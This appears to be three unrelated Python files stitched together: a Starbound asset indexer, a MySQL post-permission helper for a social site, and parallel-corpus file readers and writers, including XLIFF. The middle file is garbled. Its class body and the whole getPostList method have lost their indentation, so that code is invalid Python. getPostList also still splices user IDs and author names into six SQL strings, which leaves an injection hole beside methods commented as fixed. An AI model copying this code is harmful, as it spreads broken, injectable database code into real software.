    stripped = comment_re.sub(_strip_comment, content)
    return decoder.decode(stripped)
def load_asset_file(filename):
    """Read *filename* and parse it as comment-tolerant JSON."""
    with open(filename) as asset_file:
        return parse_json(asset_file.read(), filename)
class Assets(object):
    """Index of Starbound assets (vanilla, mod folders and .pak files).

    The index lives in a sqlite database with one row per asset:
    (key, path, type, category, name, desc).
    """

    def __init__(self, db_file, starbound_folder):
        # db_file may be a filename or ":memory:".
        self.starbound_folder = starbound_folder
        self.mods_folder = os.path.join(self.starbound_folder, "giraffe_storage", "mods")
        self.db = sqlite3.connect(db_file)
        self.vanilla_assets = os.path.join(self.starbound_folder, "assets", "packed.pak")
        # cache of raw image bytes, keyed by asset key
        self.image_cache = {}

    def init_db(self):
        """Drop and recreate the assets table."""
        c = self.db.cursor()
        c.execute("drop table if exists assets")
        c.execute("""create table assets
(key text, path text, type text, category text, name text, desc text)""")
        self.db.commit()

    def total_indexed(self):
        """Return the number of indexed assets (0 if the table is missing/corrupt)."""
        c = self.db.cursor()
        try:
            c.execute("select count(*) from assets")
        except sqlite3.OperationalError:
            # database may be corrupt
            return 0
        return c.fetchone()[0]

    def create_index(self, asset_files=False):
        """Index every asset; a generator yielding (key, path) as it progresses."""
        logging.info("Creating new assets index...")

        if not asset_files:
            asset_files = self.find_assets()

        blueprints = Blueprints(self)
        items = Items(self)
        species = Species(self)
        monsters = Monsters(self)
        techs = Techs(self)
        frames = Frames(self)

        new_index_query = "insert into assets values (?, ?, ?, ?, ?, ?)"
        c = self.db.cursor()

        for asset in asset_files:
            yield (asset[0], asset[1])
            tmp_data = None
            # dispatch to the first matching asset-type indexer
            if asset_category(asset[0]) != '':
                if asset[0].endswith(".png"):
                    tmp_data = (asset[0], asset[1], "image", "", "", "")
                elif blueprints.is_blueprint(asset[0]):
                    tmp_data = blueprints.index_data(asset)
                elif species.is_species(asset[0]):
                    tmp_data = species.index_data(asset)
                elif items.is_item(asset[0]):
                    tmp_data = items.index_data(asset)
                elif monsters.is_monster(asset[0]):
                    tmp_data = monsters.index_data(asset)
                elif techs.is_tech(asset[0]):
                    tmp_data = techs.index_data(asset)
                elif frames.is_frames(asset[0]):
                    tmp_data = frames.index_data(asset)
            else:
                logging.warning("Skipping invalid asset (no file extension) %s in %s" % (asset[0], asset[1]))

            if tmp_data is not None:
                c.execute(new_index_query, tmp_data)

        self.db.commit()
        logging.info("Finished creating index")

    def find_assets(self):
        """Scan all Starbound assets and return key/file list.

        Includes mod files, .pak files.
        """
        index = []
        vanilla_path = os.path.join(self.starbound_folder, "assets")
        logging.info("Scanning vanilla assets")
        # (was a side-effect list comprehension; extend is the idiomatic form)
        index.extend(self.scan_asset_folder(vanilla_path))

        mods_path = self.mods_folder
        if not os.path.isdir(mods_path):
            return index
        for mod in os.listdir(mods_path):
            mod_folder = os.path.join(mods_path, mod)
            if os.path.isdir(mod_folder):
                logging.info("Scanning mod folder: " + mod)
                index.extend(self.scan_asset_folder(mod_folder))
            elif mod_folder.endswith(".modpak"):
                logging.info("Scanning modpak: " + mod)
                index.extend(self.scan_modpak(mod_folder))
        return index

    def scan_modpak(self, modpak):
        """Return (key, path) pairs for every asset inside a .modpak file."""
        # TODO: may need support for reading the mod folder from the pakinfo file
        db = starbound.open_file(modpak)
        index = [(x, modpak) for x in db.get_index()]
        return index

    def scan_asset_folder(self, folder):
        """Return (key, path) pairs for every asset under *folder*.

        Handles packed.pak folders, .modinfo-based mods and bare legacy
        asset folders.
        """
        pak_path = os.path.join(folder, "packed.pak")

        if os.path.isfile(pak_path):
            db = starbound.open_file(pak_path)
            index = [(x, pak_path) for x in db.get_index()]
            return index
        else:
            # old style, probably a mod
            index = []
            mod_assets = None
            files = os.listdir(folder)

            # TODO: will need more logic to handle .modpack with modinfo inside.
            found_mod_info = False
            for f in files:
                if f.endswith(".modinfo"):
                    modinfo = os.path.join(folder, f)
                    try:
                        modinfo_data = load_asset_file(modinfo)
                        path = "./"
                        if "path" in modinfo_data.keys():
                            path = modinfo_data["path"]
                        mod_assets = os.path.join(folder, path)
                        found_mod_info = True
                    except ValueError:
                        # really old mods
                        folder = os.path.join(folder, "assets")
                        if os.path.isdir(folder):
                            mod_assets = folder

            if mod_assets is None:
                return index
            elif found_mod_info and self.is_packed_file(mod_assets):
                # TODO: make a .pak scanner function that works for vanilla and mods
                pak_path = os.path.normpath(mod_assets)
                db = starbound.open_file(pak_path)
                for x in db.get_index():
                    # removes thumbs.db etc from user pak files
                    if re.match(ignore_assets, x) is None:
                        index.append((x, pak_path))
                return index
            elif not os.path.isdir(mod_assets):
                return index

            # now we can scan!
            for root, dirs, files in os.walk(mod_assets):
                for f in files:
                    if re.match(ignore_assets, f) is None:
                        asset_folder = os.path.normpath(mod_assets)
                        asset_file = os.path.normpath(os.path.join(root.replace(folder, ""), f))
                        index.append((asset_file, asset_folder))
            return index

    def is_packed_file(self, path):
        """
        Returns true if the asset path is a file (will be assuming from the index that it is a packed type)
        Returns false if the asset path is a folder (legacy/non-packed mods)
        """
        return os.path.isfile(path)

    def read(self, key, path, image=False):
        """Read asset *key* from *path* (.pak file or asset folder).

        Returns parsed JSON, raw image bytes when image=True, or None on
        failure. Image reads fall back to the vanilla assets and are cached
        in self.image_cache.
        """
        if self.is_packed_file(path):
            key = key.lower()
            db = starbound.open_file(path)
            # try the cache first
            if image and key in self.image_cache:
                return self.image_cache[key]
            try:
                data = db.get(key)
            except KeyError:
                if image and path != self.vanilla_assets:
                    img = self.read(key, self.vanilla_assets, image)
                    self.image_cache[key] = img
                    return img
                else:
                    logging.exception("Unable to read db asset '%s' from '%s'" % (key, path))
                    return None
            if image:
                img = data
                self.image_cache[key] = img
                return img
            else:
                try:
                    asset = parse_json(data.decode("utf-8"), key)
                    return asset
                except ValueError:
                    logging.exception("Unable to read db asset '%s' from '%s'" % (key, path))
                    return None
        else:
            asset_file = os.path.join(path, key[1:])
            try:
                if image:
                    # BUG FIX: use a context manager; the handle was never closed
                    with open(asset_file, "rb") as img_file:
                        img = img_file.read()
                    self.image_cache[key] = img
                    return img
                else:
                    asset = load_asset_file(asset_file)
                    return asset
            except (FileNotFoundError, ValueError):
                if image and path != self.vanilla_assets:
                    if self.is_packed_file(self.vanilla_assets):
                        # pak keys use forward slashes
                        img = self.read(key.replace("\\", "/"), self.vanilla_assets, image)
                    else:
                        img = self.read(key, self.vanilla_assets, image)
                    self.image_cache[key] = img
                    return img
                else:
                    logging.exception("Unable to read asset file '%s' from '%s'" % (key, path))
                    return None

    # thin factories for the per-type indexers
    def blueprints(self):
        return Blueprints(self)

    def items(self):
        return Items(self)

    def species(self):
        return Species(self)

    def player(self):
        return Player(self)

    def monsters(self):
        return Monsters(self)

    def techs(self):
        return Techs(self)

    def images(self):
        return Images(self)

    def frames(self):
        return Frames(self)

    def get_all(self, asset_type):
        """Return all indexed rows of *asset_type*, sorted by name."""
        # BUG FIX: was self.assets.db -- Assets has no 'assets' attribute
        c = self.db.cursor()
        c.execute("select * from assets where type = ? order by name collate nocase", (asset_type,))
        return c.fetchall()

    def get_categories(self, asset_type):
        """Return the distinct categories present for *asset_type*."""
        # BUG FIX: was self.assets.db
        c = self.db.cursor()
        c.execute("select distinct category from assets where type = ? order by category", (asset_type,))
        return [x[0] for x in c.fetchall()]

    def filter(self, asset_type, category, name):
        """Return rows of *asset_type* matching *category* and a name/desc
        substring; category '<all>' matches every category."""
        if category == "<all>":
            category = "%"
        name = "%" + name + "%"
        c = self.db.cursor()
        q = """select * from assets where type = ? and category like ?
and (name like ? or desc like ?) order by desc, name collate nocase"""
        c.execute(q, (asset_type, category, name, name))
        result = c.fetchall()
        return result

    def get_total(self, asset_type):
        """Return the number of indexed assets of *asset_type*."""
        # BUG FIX: was self.assets.db, and (asset_type) is not a tuple --
        # sqlite3 requires a sequence of parameters.
        c = self.db.cursor()
        c.execute("select count(*) from assets where type = ?", (asset_type,))
        return c.fetchone()[0]

    def missing_icon(self):
        """Return the placeholder icon used when an item has no image."""
        return self.read("/interface/inventory/x.png", self.vanilla_assets, image=True)

    def get_mods(self):
        """Return a list of all unique mod paths."""
        c = self.db.cursor()
        c.execute("select distinct path from assets order by category")
        all_assets = [x[0].replace(self.starbound_folder, "") for x in c.fetchall()]
        return [x for x in all_assets if not x.endswith("packed.pak")]
# Smoke test: rebuild the index from a default Starbound install location
# and print a running count of indexed assets.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    assets = Assets("assets.db", "/opt/starbound")
    assets.init_db()
    logging.info("Started indexing...")
    count = 0
    for i in assets.create_index():
        count += 1
        print(count)
    logging.info("Finished!")
| |
import mysql.connector
from databasehelper import *
from authorhelper import *
import sys
sys.path.append("sys/model")
from post import *
import json
class PostHelper:
"""
#an post helper,which controls the post model
"""
dbHelper = None
def __init__(self,dbHelper):
    # dbHelper: the DatabaseHelper used to obtain cursors and commit
    # transactions for every query in this class.
    self.dbHelper = dbHelper
"""
to add a post to databse
dbhelper -- the databasehelper
post -- the post object
"""
def addPost(self,post):
    """Insert *post* into the post table (time column defaults to NULL).

    post -- object exposing getpid/getaid/gettitle/getmessage/gettype/getpermission
    Returns True when a row was inserted, False on error.
    """
    # BUG FIX: was self.dbhelper (lowercase h) -> AttributeError; the
    # attribute set in __init__ is dbHelper.
    cur = self.dbHelper.getcursor()
    pid = post.getpid()
    aid = post.getaid()
    title = post.gettitle()
    message = post.getmessage()
    msg_type = post.gettype()
    permission = post.getpermission()
    # Parameterized query: the old %-formatted string was injectable via
    # user-supplied title/message content.
    query = "INSERT INTO post VALUES(%s,%s,NULL,%s,%s,%s,%s)"
    params = (pid, aid, title, message, msg_type, permission)
    try:
        cur.execute(query, params)
        self.dbHelper.commit()
    except mysql.connector.Error as err:
        print("****************************************")
        print("SQLException from addPost():")
        print("Error code:", err.errno)
        print("SQLSTATE value:", err.sqlstate)
        print("Error message:", err.msg)
        print("Might be query issue:",query)
        print("****************************************")
        return False
    except Exception as err:
        # BUG FIX: format string had no placeholder, so err was dropped
        print("General Exception from addPost(): {0}".format(err))
        return False
    return cur.rowcount>0
"""add a user permission to post in databse
dbhelper -- databse helper
pid -- post id
aid -- author id
"""
def addPostPermission(self,dbhelper,pid,aid):
    """Grant the user *aid* permission on post *pid*.

    dbhelper -- unused; kept for backward compatibility with existing callers
    pid -- post id
    aid -- author id
    Returns True when a row was inserted, False on error.
    """
    cur = self.dbHelper.getcursor()
    # Parameterized to avoid SQL injection via pid/aid values.
    query = "INSERT INTO user_permission VALUES(%s,%s)"
    try:
        cur.execute(query, (pid, aid))
        self.dbHelper.commit()
    except mysql.connector.Error as err:
        print("****************************************")
        print("SQLException is raised by addPostPermission():")
        print("Error code:", err.errno)
        print("SQLSTATE value:", err.sqlstate)
        print("Error message:", err.msg)
        print("Might be query issue:",query)
        print("****************************************")
        return False
    except Exception as err:
        # BUG FIX: format string had no placeholder, so err was dropped
        print("General Exception from addPostPermission(): {0}".format(err))
        return False
    return cur.rowcount>0
#type argument should be one of ['pid','aid','time','message','title','permission']
#Usage: updatepost(databasehelper,pid,type="html", permmision="public") check keyword argument
def updateMessage(self,pid,newContent):
    """Update the message body of a post.

    pid -- post id
    newContent -- the new content of the post
    Returns True when a row was updated, False on error.
    """
    cur = self.dbHelper.getcursor()
    # Parameterized to avoid SQL injection via user-supplied content.
    query = "UPDATE post SET message=%s WHERE pid=%s"
    try:
        cur.execute(query, (newContent, pid))
        self.dbHelper.commit()
    except mysql.connector.Error as err:
        print("****************************************")
        print("SQLException is raised by updateMessage():")
        print("Error code:", err.errno)
        print("SQLSTATE value:", err.sqlstate)
        print("Error message:", err.msg)
        print("Might be query issue:",query)
        print("****************************************")
        return False
    except Exception as err:
        # BUG FIX: format string had no placeholder, so err was dropped
        print("General Exception is raised by updateMessage(): {0}".format(err))
        return False
    return cur.rowcount>0
def updateTitle(self,pid,newtitle):
    """Update the title of a post.

    BUG FIX: this method was previously also named updateMessage, which
    silently shadowed the real updateMessage defined above it; per its
    own docstring it updates the title, so it is named accordingly.

    pid -- post id
    newtitle -- new title need to be updated
    Returns True when a row was updated, False on error.
    """
    cur = self.dbHelper.getcursor()
    # Parameterized to avoid SQL injection via the user-supplied title.
    query = "UPDATE post SET title=%s WHERE pid=%s"
    try:
        cur.execute(query, (newtitle, pid))
        self.dbHelper.commit()
    except mysql.connector.Error as err:
        print("****************************************")
        # BUG FIX: messages previously named updateTime() (copy-paste)
        print("SQLException is raised by updateTitle():")
        print("Error code:", err.errno)
        print("SQLSTATE value:", err.sqlstate)
        print("Error message:", err.msg)
        print("Might be query issue:",query)
        print("****************************************")
        return False
    except Exception as err:
        print("General Exception is raised by updateTitle(): {0}".format(err))
        return False
    return cur.rowcount>0
def updateTime(self,dbhelper,pid,time = ''):
    """Update the time of a post.

    dbhelper -- unused; kept for backward compatibility with existing callers
    time -- 'YYYY-MM-DD HH:MM:SS'; when empty the column is set to NULL
            (per the original docstring this yields the current time --
            presumably via a schema default; confirm against the schema)
    Returns True when a row was updated, False on error.
    """
    cur = self.dbHelper.getcursor()
    # Parameterized to avoid SQL injection via pid/time values.
    if time == '':
        query = "UPDATE post SET time=NULL WHERE pid=%s"
        params = (pid,)
    else:
        query = "UPDATE post SET time=%s WHERE pid=%s"
        params = (time, pid)
    try:
        cur.execute(query, params)
        self.dbHelper.commit()
    except mysql.connector.Error as err:
        print("****************************************")
        print("SQLException is raised by updateTime():")
        print("Error code:", err.errno)
        print("SQLSTATE value:", err.sqlstate)
        print("Error message:", err.msg)
        print("Might be query issue:",query)
        print("****************************************")
        return False
    except Exception as err:
        # BUG FIX: message previously said authorAuthenticate() (copy-paste)
        # and the format string had no placeholder, so err was dropped.
        print("General Exception is raised by updateTime(): {0}".format(err))
        return False
    return cur.rowcount>0
# if you need change to permission to user, you need to specify the user aid
# HAVEN'T BEEN COMPLETED YET
def updatePermission(self,pid,newPermission,user=''):
    """Update the permission of a post.

    pid -- post id
    newPermission -- the new permission value
    user -- when newPermission is 'user', the aid to grant (not yet wired up)
    Returns True when a row was updated, False on error.
    """
    cur = self.dbHelper.getcursor()
    # Parameterized to avoid SQL injection via permission/pid values.
    query = "UPDATE post SET permission=%s WHERE pid=%s"
    try:
        # BUG FIX: this execute previously ran outside the try block (errors
        # escaped unhandled) and, in the 'user' branch, the same UPDATE was
        # then executed a second time inside the try.
        cur.execute(query, (newPermission, pid))
        if newPermission == 'user':
            #TODO:Change the following
            print("neeed to be fixed")
            #self.addPostPermission(dbhelper,pid,user)
        else:
            # permission no longer per-user: drop any per-user grants
            query = "DELETE FROM user_permission WHERE pid=%s"
            cur.execute(query, (pid,))
        self.dbHelper.commit()
    except mysql.connector.Error as err:
        print("****************************************")
        print("SQLException is raised by updatePermission():")
        print("Error code:", err.errno)
        print("SQLSTATE value:", err.sqlstate)
        print("Error message:", err.msg)
        print("Might be query issue:",query)
        print("****************************************")
        return False
    except Exception as err:
        # BUG FIX: format string had no placeholder, so err was dropped
        print("General Exception is raised by updatePermission(): {0}".format(err))
        return False
    return cur.rowcount>0
def deletePostByPid(self,pid):
    """Delete the post identified by *pid*.

    pid -- post id
    Returns True when a row was deleted, False on error.
    """
    cur = self.dbHelper.getcursor()
    # BUG FIX: the old code guarded the query behind `if type == "pid"`,
    # comparing the *builtin* type to a string (always False), and used an
    # undefined name `key` -- so an empty query string was always executed.
    # Parameterized to avoid SQL injection via pid.
    query = "DELETE FROM post WHERE pid = %s"
    try:
        cur.execute(query, (pid,))
        self.dbHelper.commit()
    except mysql.connector.Error as err:
        print("****************************************")
        print("SQLException is raised by deletePostByPid():")
        print("Error code:", err.errno)
        print("SQLSTATE value:", err.sqlstate)
        print("Error message:", err.msg)
        print("Might be query issue:",query)
        print("****************************************")
        return False
    except Exception as err:
        # BUG FIX: format string had no placeholder, so err was dropped
        print("General Exception is raised by deletePostByPid(): {0}".format(err))
        return False
    return cur.rowcount>0
def deletePostByAid(self,aid):
    """Delete all posts written by author *aid*.

    aid -- author id
    Returns True when at least one row was deleted, False on error.
    """
    cur = self.dbHelper.getcursor()
    # BUG FIX: the old code guarded the query behind `if type == "aid"`,
    # comparing the *builtin* type to a string (always False), so an empty
    # query string was always executed. Parameterized to avoid injection.
    query = "DELETE FROM post WHERE aid = %s"
    try:
        cur.execute(query, (aid,))
        self.dbHelper.commit()
    except mysql.connector.Error as err:
        print("****************************************")
        print("SQLException is raised by deletePostByAid():")
        print("Error code:", err.errno)
        print("SQLSTATE value:", err.sqlstate)
        print("Error message:", err.msg)
        print("Might be query issue:",query)
        print("****************************************")
        return False
    except Exception as err:
        # BUG FIX: format string had no placeholder, so err was dropped
        print("General Exception from deletePostByAid(): {0}".format(err))
        return False
    return cur.rowcount>0
def getPostList(self,aid):
"""
get list of post that the user by aid can browse
aid -- author id
"""
re = {}
cur = self.dbHelper.getcursor()
#get the post if it is public
query = "SELECT * FROM post WHERE permission='public';"
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("1st Query:",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 1st block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is its author
query = "SELECT * FROM post WHERE permission='me' and aid='%s'"%(aid)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("2nd Query:",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 2nd block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is specifiied user
query = "SELECT * FROM post WHERE permission = 'user' and pid IN (SELECT pid from user_permission WHERE aid='%s')"%(aid)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("3rd Query:",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 3rd block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is the author's friend
authorHelper = AuthorHelper(self.dbHelper)
authorName = authorHelper.getAuthorNameByAid(aid)
try:
if(authorName == None):
raise Exception('Failed to get the name by id in getPostList() function')
except Exception as err:
print("***************************************")
print(err.args)
print("***************************************")
return None
query = "SELECT * FROM post WHERE permission = 'friends' and aid IN (SELECT aid from author WHERE author_name IN (SELECT name1 FROM circle WHERE name2 ='%s' ))"%(authorName)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("4th Query",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 4th block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is the author's friends`s friend
query = "SELECT * FROM post WHERE permission = 'fof' and aid IN (SELECT aid from author WHERE author_name IN (SELECT name1 FROM circle WHERE name2 IN (SELECT name1 FROM circle WHERE name2 = '%s')))"%(authorName)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("5th Query",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 5th block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is in the same host as the permission's requirement
query = "SELECT * FROM post WHERE permission='fomh' AND aid IN (SELECT a1.aid FROM author a1,author a2 WHERE a1.sid = a2.sid AND a2.aid = '%s')"%(aid)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("6th Query:",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 6th block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
return json.dumps(re)
| |
import copy
import glob
import os
import re
from xml.etree import ElementTree
class FileFormat(object):
    """Abstract interface for bilingual corpus storage formats.

    Concrete subclasses supply context-managed reader/writer objects.
    """

    def reader(self):
        """Return a context manager that iterates (source, target) line pairs."""
        raise NotImplementedError

    def writer(self, append=False):
        """Return a context manager exposing write(src_line, tgt_line)."""
        raise NotImplementedError
class DevNullFileFormat(FileFormat):
    """A sink format: every write is discarded and reads yield nothing."""

    class NullWriter(object):
        """Context-managed writer that silently drops each pair."""
        def __enter__(self):
            return self

        def __exit__(self, exc_type, exc_val, exc_tb):
            return None

        def write(self, src_line, tgt_line):
            # Intentionally a no-op.
            return None

    class NullReader(object):
        """Context-managed, always-empty iterator."""
        def __enter__(self):
            return self

        def __exit__(self, exc_type, exc_val, exc_tb):
            return None

        def __iter__(self):
            return self

        def __next__(self):
            # Empty stream: exhausted immediately.
            raise StopIteration

    def reader(self):
        """Return an empty reader."""
        return self.NullReader()

    def writer(self, append=False):
        """Return a writer that discards everything."""
        return self.NullWriter()
class ParallelFileFormat(FileFormat):
    """Parallel corpus stored as two aligned plain-text files, one sentence
    per line: ``<name>.<src_lang>`` and ``<name>.<tgt_lang>``.
    """

    class Reader(object):
        """Context-managed iterator over aligned (source, target) line pairs."""

        def __init__(self, src_file, tgt_file) -> None:
            self._src_file = src_file
            self._tgt_file = tgt_file
            self._src_stream = None
            self._tgt_stream = None

        def __enter__(self):
            self._src_stream = open(self._src_file, 'r', encoding='utf-8')
            try:
                self._tgt_stream = open(self._tgt_file, 'r', encoding='utf-8')
            except Exception:
                # BUGFIX: do not leak the source stream when the target file
                # fails to open (the original left it open).
                self._src_stream.close()
                self._src_stream = None
                raise
            return self

        def __exit__(self, exc_type, exc_val, exc_tb):
            # Close both streams even if the first close() raises.
            try:
                self._src_stream.close()
            finally:
                self._tgt_stream.close()

        def __iter__(self):
            # zip() stops at the shorter file; trailing unaligned lines are ignored.
            for src_line, tgt_line in zip(self._src_stream, self._tgt_stream):
                yield src_line.rstrip('\n'), tgt_line.rstrip('\n')

    class Writer(object):
        """Context-managed writer appending one line per segment to each file."""

        def __init__(self, src_file, tgt_file, append=False) -> None:
            self._src_file = src_file
            self._tgt_file = tgt_file
            self._src_stream = None
            self._tgt_stream = None
            self._append = append

        def __enter__(self):
            mode = 'a' if self._append else 'w'
            self._src_stream = open(self._src_file, mode, encoding='utf-8')
            try:
                self._tgt_stream = open(self._tgt_file, mode, encoding='utf-8')
            except Exception:
                # BUGFIX: release the source stream if the target open fails.
                self._src_stream.close()
                self._src_stream = None
                raise
            return self

        def __exit__(self, exc_type, exc_val, exc_tb):
            try:
                self._src_stream.close()
            finally:
                self._tgt_stream.close()

        def write(self, src_line, tgt_line):
            # Inner newlines are flattened so the files stay line-aligned.
            src_line, tgt_line = src_line.rstrip('\n').replace('\n', ' '), tgt_line.rstrip('\n').replace('\n', ' ')
            self._src_stream.write(src_line + '\n')
            self._tgt_stream.write(tgt_line + '\n')

    @classmethod
    def from_path(cls, src_lang, tgt_lang, name, path):
        """Build a format instance for ``path/name.<src_lang>`` and ``path/name.<tgt_lang>``."""
        src_file = os.path.join(path, name + '.' + src_lang)
        tgt_file = os.path.join(path, name + '.' + tgt_lang)
        return cls(src_lang, tgt_lang, src_file, tgt_file)

    @classmethod
    def list(cls, src_lang, tgt_lang, path):
        """Return all corpora in *path* that have both language files present."""
        result = []
        for src_file in glob.glob(os.path.join(path, '*.' + src_lang)):
            tgt_file = os.path.splitext(src_file)[0] + '.' + tgt_lang
            if os.path.isfile(tgt_file):
                result.append(cls(src_lang, tgt_lang, src_file, tgt_file))
        return result

    def __init__(self, src_lang, tgt_lang, src_file, tgt_file) -> None:
        self._src_lang = src_lang
        self._tgt_lang = tgt_lang
        self._src_file = src_file
        self._tgt_file = tgt_file
        # Corpus name = source file basename without its language extension.
        self._name = os.path.splitext(os.path.basename(src_file))[0]

    @property
    def name(self):
        return self._name

    @property
    def src_lang(self):
        return self._src_lang

    @property
    def tgt_lang(self):
        return self._tgt_lang

    @property
    def src_file(self):
        return self._src_file

    @property
    def tgt_file(self):
        return self._tgt_file

    def reader(self):
        """Return a Reader over the two aligned files."""
        return self.Reader(self._src_file, self._tgt_file)

    def writer(self, append=False):
        """Return a Writer; truncates unless *append* is True."""
        return self.Writer(self._src_file, self._tgt_file, append=append)
class CompactFileFormat(FileFormat):
    """Parallel corpus stored in a single file as repeating triplets:
    source line, target line, then a metadata line ``0,<src> <tgt>[,<tuid>]``.
    """

    class Reader(object):
        """Context-managed iterator over the triplet-encoded file."""

        def __init__(self, file_path, include_meta=False) -> None:
            self._file_path = file_path
            self._stream = None
            self._include_meta = include_meta

        def __enter__(self):
            self._stream = open(self._file_path, 'r', encoding='utf-8')
            return self

        def __exit__(self, exc_type, exc_val, exc_tb):
            self._stream.close()

        def __iter__(self):
            stream = self._stream
            for raw_src in stream:
                src_line = raw_src.rstrip('\n')
                tgt_line = stream.readline().rstrip('\n')
                meta_line = stream.readline().strip()
                if not self._include_meta:
                    yield src_line, tgt_line
                    continue
                # Metadata layout: "0,<src_lang> <tgt_lang>[,<tuid>]".
                fields = meta_line.split(',', maxsplit=2)
                src_lang, tgt_lang = fields[1].split()
                tuid = fields[2] if len(fields) > 2 else None
                yield tuid, src_lang, tgt_lang, src_line, tgt_line

    class Writer(object):
        """Context-managed writer emitting one triplet per segment pair."""

        def __init__(self, src_lang, tgt_lang, file_path, append=False) -> None:
            self._src_lang = src_lang
            self._tgt_lang = tgt_lang
            self._file_path = file_path
            self._stream = None
            self._append = append

        def __enter__(self):
            mode = 'a' if self._append else 'w'
            self._stream = open(self._file_path, mode, encoding='utf-8')
            return self

        def __exit__(self, exc_type, exc_val, exc_tb):
            self._stream.close()

        def write(self, src_line, tgt_line, tuid=None):
            # Flatten inner newlines so each segment stays on one line.
            clean_src = src_line.rstrip('\n').replace('\n', ' ')
            clean_tgt = tgt_line.rstrip('\n').replace('\n', ' ')
            self._stream.write(clean_src + '\n')
            self._stream.write(clean_tgt + '\n')
            if tuid is None:
                meta = '0,%s %s\n' % (self._src_lang, self._tgt_lang)
            else:
                meta = '0,%s %s,%s\n' % (self._src_lang, self._tgt_lang, tuid)
            self._stream.write(meta)

    def __init__(self, src_lang, tgt_lang, file_path) -> None:
        self._src_lang = src_lang
        self._tgt_lang = tgt_lang
        self._file_path = file_path
        # Corpus name = file basename without extension.
        self._name = os.path.splitext(os.path.basename(file_path))[0]

    @property
    def name(self):
        return self._name

    @property
    def src_lang(self):
        return self._src_lang

    @property
    def tgt_lang(self):
        return self._tgt_lang

    @property
    def file_path(self):
        return self._file_path

    def reader(self):
        """Reader yielding (src, tgt) pairs, metadata skipped."""
        return self.Reader(self._file_path, include_meta=False)

    def reader_with_metadata(self):
        """Reader yielding (tuid, src_lang, tgt_lang, src, tgt) tuples."""
        return self.Reader(self._file_path, include_meta=True)

    def writer(self, append=False):
        """Writer for this file; truncates unless *append* is True."""
        return self.Writer(self._src_lang, self._tgt_lang, self._file_path, append=append)
class XLIFFFileFormat(FileFormat):
    """Read/write support for bilingual XLIFF 1.2 documents (including the
    SDLXLIFF and MQXliff dialects).

    The document is parsed once in ``__init__``; translatable segments are
    collected as (source element, target element) pairs.  ``reader()`` yields
    their text content; ``writer()`` patches translations back into the tree
    and serializes it on exit.
    """
    NAMESPACES = {
        'xlf': 'urn:oasis:names:tc:xliff:document:1.2',
        'sdl': 'http://sdl.com/FileTypes/SdlXliff/1.0',
        'mq': 'MQXliff'
    }
    DEFAULT_NAMESPACE = 'urn:oasis:names:tc:xliff:document:1.2'
    SDL_NAMESPACE = 'http://sdl.com/FileTypes/SdlXliff/1.0'

    class TransUnit(object):
        """One <trans-unit>: a list of aligned (source, target) segment elements."""

        @classmethod
        def parse(cls, tu, target_lang):
            """Extract segment pairs from *tu*, creating an empty <target>
            (tagged with *target_lang*) when the unit has none.

            Raises ValueError when segmented sources lack a matching target
            <mrk> or a "mid" attribute.
            """
            entries = []
            ns = XLIFFFileFormat.NAMESPACES
            # Target part
            target_tag = tu.find('xlf:target', ns)
            if target_tag is None:
                target_tag = ElementTree.Element('target', attrib={
                    'xml:lang': target_lang
                })
                tu.append(target_tag)
            # Source part: prefer the segmented <seg-source> when present.
